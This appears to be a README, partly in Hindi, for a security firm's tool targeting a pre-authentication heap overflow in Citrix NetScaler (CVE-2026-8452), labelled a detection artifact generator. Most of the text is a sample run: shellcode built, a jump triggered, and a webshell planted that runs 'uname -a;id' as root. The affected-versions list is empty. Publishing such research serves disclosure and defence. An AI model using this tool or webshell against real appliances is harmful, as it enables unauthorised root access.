
CVE-2026-8452 PreAuth RCE
Citrix NetScaler CVE-2026-8452 के लिए डिटेक्शन आर्टिफैक्ट जनरेटर
तकनीकी विवरण के लिए हमारी ब्लॉग पोस्ट देखें।
python3 watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py --target https://172.16.5.12:9443/
__ ___ ___________
__ _ ______ _/ |__ ____ | |_\__ ____\____ _ ________
\ \/ \/ \__ \ ___/ ___\| | \| | / _ \ \/ \/ \_ __ \
\ / / __ \| | \ \___| Y | |( <_> \ / | | \/
\/\_/ (____ |__| \___ |___|__|__ | \__ / \/\_/ |__|
\/ \/ \/
watchTowr-vs-Citrix-Netscaler-PreAuth-RCE.py
(*) Citrix NetScaler PreAuth Heap overflow to RCE Detection Artifact Generator
- Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)
CVEs: [CVE-2026-8452]
[*] Connecting to endpoint...
[*] target AAA service is responsive
[*] building shellcode
[+] shellcode size: 268 bytes
[*] triggering jmp rax to 0x112d30180
[*] sent..
[+] webshell will be at https://172.16.5.12:9443/vpn/theme/x.php?0=uname+-a;id
[+] web shell output:
FreeBSD something 11.4-NETSCALER-13.1 FreeBSD 11.4-NETSCALER-13.1 #0 ef731ca813f0(heads/artesa_30_52)-dirty: Wed Aug 24 08:24:55 PDT 2022 root@sjc-bld-bsd114-215:/usr/obj/usr/home/build/adc/usr.src/sys/NS64 amd64
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)
uid=65534(nobody) gid=65534(nobody) euid=0(root) egid=0(wheel) groups=0(wheel)
सभी ऑफ़सेट/पते NetScaler के संस्करण 13.1-30.52 के लिए हार्डकोडेड हैं
यह भेद्यता तब पहुँच योग्य है जब NetScaler उपकरण SAML का उपयोग या तो सेवा प्रदाता (SP) या पहचान प्रदाता (IdP) के रूप में करने के लिए कॉन्फ़िगर किया गया हो।
Citrix निम्नलिखित संस्करणों को प्रभावित बताता है:
नवीनतम सुरक्षा अनुसंधान के लिए watchTowr लैब्स टीम का अनुसरण करें